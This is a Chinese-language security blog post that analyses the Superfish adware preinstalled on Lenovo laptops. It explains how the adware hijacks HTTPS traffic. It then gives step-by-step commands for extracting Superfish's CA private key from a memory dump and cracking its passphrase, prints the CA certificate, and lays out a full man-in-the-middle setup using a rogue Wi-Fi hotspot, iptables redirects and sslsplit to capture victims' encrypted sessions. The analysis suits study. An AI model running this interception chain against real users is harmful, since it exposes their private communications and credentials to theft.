Superfish這個事件,國內外報道的都很多,不過我個人感覺國內對漏洞事件的敏感度挺高,都是搶先第一個翻譯報道,但是很少看到細節分析。國外的研究者在自己的博客有一些分析,我提取出來和大家分享學習,有理解不對的地方還希望指正。
聯想筆記本用戶從去年年中開始在官方論壇上報告他們的電腦預裝了廣告軟件Superfish,Superfish會在用戶電腦上安裝自簽名證書,劫持用戶瀏覽的HTTPS/HTTP網頁,劫持搜索結果,在Google搜索頁面及其它網站上注入廣告。聯想客服代表Mark Hopkins證實Superfish是該公司預裝在電腦中的,用戶投訴之后他們已從系統中將該軟件臨時移除,這次事件給聯想公司帶來一連串公關災難,聯想宣布到Windows 10發布時,上市的聯想電腦將會運行純凈的操作系統,不再捆綁第三方的臃腫軟件(bloatware),同時向受Superfish影響的客戶提供6個月的McAfee LiveSafe安全軟件服務,并提供移除工具(https://github.com/lenovo-inc/superfishremoval)。
Superfish軟件在安裝的時候默認會把文件釋放到 C:\Program Files\Lenovo\VisualDiscovery,然后執行下面命令
run.exe 30000 VisualDiscovery.exe /Auto /Service
run.exe 30000 C:\WINDOWS\system32\sc.exe start VisualDiscovery
run.exe 30000 VDWFPInstaller.exe install
superfish基于Komodia的引擎,他會注冊服務,并且安裝驅動,這些驅動文件也都有自己的簽名,不過已經過期了。安裝目錄有個VDWFP.pdb文件,是使用WFP(Windows Filtering Platform)實現連接重定向的,也會在注冊表添加HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VDWFP項,包括要劫持的應用程序列表,不劫持的IP地址,劫持端口等信息。還會開放23154,23156,23160端口實現代理,方便中間人攻擊。SuperfishCert.dll文件的作用是安裝惡意證書到應用程序,VisualDiscovery.exe使用OpenSSL的靜態鏈接文件,包含公共密鑰是私有密鑰,但是我逆向基礎差,沒有從這里看到,而是通過dump出的內存找到的,下一節會有介紹。
此時你在訪問HTTPS網站的時候,瀏覽器里顯示的SSL證書的頒發頒發機構(CA)會是superfish,而不是常見的VeriSign,如圖:
Superfish的目的是在用戶電腦上安裝自簽名證書,劫持用戶瀏覽的HTTPS/HTTP網頁,插入廣告。從上可以知道superfish本身也是認證機構(CA),如果我們能夠得到CA的私鑰, 自簽名證書,還能做更多有意思的事情。
首先使用procdump工具dump出VisualDiscovery.exe進程的內存信息
procdump -ma VisualDiscovery.exe super.dmp
然后使用strings小工具提取super.dmp 中的字符串,如圖
Strings.exe super.dmp > stringsuper.txt
在stringsuper.txt文件中搜索"PRIVATE KEY",可以看到證書信息,把相關信息COPY出來(https://github.com/robertdavidgraham/pemcrack/blob/master/test.pem),然后用openssl導入證書和密鑰,確提示輸入密碼
老外有放出來一個單線程的破解工具(https://github.com/robertdavidgraham/pemcrack),還是使用stringsuper.txt里的單詞當字典進行破解
提取字典
#!bash
grep "^[a-z]*$" stringsuper.txt | sort | uniq > super.dict
編譯工具,破解
得到密碼是komodia
得到認證機構(CA)的私鑰后,任何人都可以以該機構的身份頒發證書了。比如利用superfish的CA私鑰給惡意軟件做簽名逃避主動防御和殺毒,mcafee已經發現有真實的互聯網攻擊了(https://blogs.mcafee.com/mcafee-labs/superfish-root-certificate-used-sign-malware)
其他的攻擊利用場景:受害者機器已經安裝了superfish軟件,在一個不可信的網絡內(比如共享WIFI),自己的上網流量可以被重定向(比如攻擊者通過ARP/修改受害者機器網關/修改受害者機器的DNS配置等方法);攻擊者的平臺使用的是KALI,使用hostapd做了一個無線熱點,然后用sslsplit(https://github.com/droe/sslsplit)做中間人劫持,sslsplit比mitmproxy好的地方是,他還能支持其他基于TLS/SSL的流量,比如像FTPS,SMTP OVER SSL,IMAP OVER SSL等,操作步驟如下:
導出證書和私鑰
#!bash
[email protected]:~# openssl rsa -in test.pem -out ca.key
[email protected]:~#cat ca.cer
-----BEGIN CERTIFICATE-----
MIIC9TCCAl6gAwIBAgIJANL8E4epRNznMA0GCSqGSIb3DQEBBQUAMFsxGDAWBgNV
BAoTD1N1cGVyZmlzaCwgSW5jLjELMAkGA1UEBxMCU0YxCzAJBgNVBAgTAkNBMQsw
CQYDVQQGEwJVUzEYMBYGA1UEAxMPU3VwZXJmaXNoLCBJbmMuMB4XDTE0MDUxMjE2
MjUyNloXDTM0MDUwNzE2MjUyNlowWzEYMBYGA1UEChMPU3VwZXJmaXNoLCBJbmMu
MQswCQYDVQQHEwJTRjELMAkGA1UECBMCQ0ExCzAJBgNVBAYTAlVTMRgwFgYDVQQD
Ew9TdXBlcmZpc2gsIEluYy4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAOjz
Shh2Xxk/sc9Y6X9DBwmVgDXFD/5xMSeBmRImIKXfj2r8QlU57gk4idngNsSsAYJb
1Tnm+Y8HiN/+7vahFM6pdEXY/fAXVyqC4XouEpNarIrXFWPRt5tVgA9YvBxJ7SBi
3bZMpTrrHD2g/3pxptMQeDOuS8Ic/ZJKocPnQaQtAgMBAAGjgcAwgb0wDAYDVR0T
BAUwAwEB/zAdBgNVHQ4EFgQU+5izU38URC7o7tUJml4OVoaoNYgwgY0GA1UdIwSB
hTCBgoAU+5izU38URC7o7tUJml4OVoaoNYihX6RdMFsxGDAWBgNVBAoTD1N1cGVy
ZmlzaCwgSW5jLjELMAkGA1UEBxMCU0YxCzAJBgNVBAgTAkNBMQswCQYDVQQGEwJV
UzEYMBYGA1UEAxMPU3VwZXJmaXNoLCBJbmMuggkA0vwTh6lE3OcwDQYJKoZIhvcN
AQEFBQADgYEApHyg7ApKx3DEcWjzOyLi3JyN0JL+c35yK1VEmxu0Qusfr76645Oj
1IsYwpTws6a9ZTRMzST4GQvFFQra81eLqYbPbMPuhC+FCxkUF5i0DNSWi+kczJXJ
TtCqSwGl9t9JEoFqvtW+znZ9TqyLiOMw7TGEUI+88VAqW0qmXnwPcfo=
-----END CERTIFICATE-----
在kali上安裝sslsplit
#!bash
[email protected]:~# git clone https://github.com/droe/sslsplit
[email protected]:~# cd sslsplit/
[email protected]:~/sslsplit# make -j 10
[email protected]:~/sslsplit# make install
SSLsplit會監聽2個端口,8080(用于非SSL連接),8443(用于SSL連接),為了能夠通過這2端口轉發流量到受害者的機器,還需要用iptables做下端口重定向。
#!bash
[email protected]:~# sysctl -w net.ipv4.ip_forward=1
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443
然后攻擊者執行
#!bash
[email protected]:~# sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.cer ssl 0.0.0.0 8443
這樣受害者再訪問有HTTPS的網站時,所有會話信息會保存到/var/log/sslsplit。
這個思路也有被用在bkpctf中 (http://mweissbacher.com/blog/2015/03/01/boston-key-party-2015-kendall-challenge-superfish/)
<<圖解密碼技術>>
http://blog.kaspersky.com/lenovo-pc-with-adware-superfish-preinstalled/
http://www.0xebfe.net/blog/2015/02/20/the-analysis-of-superfish-adware/
http://blog.erratasec.com/2015/02/extracting-superfish-certificate.html
http://blog.erratasec.com/2015/02/exploiting-superfish-certificate.html
http://kinozoa.com/blog/exploiting-superfish-subterfuge/
http://blog.trendmicro.com/trendlabs-security-intelligence/extended-validation-certificates-warning-against-mitm-attacks/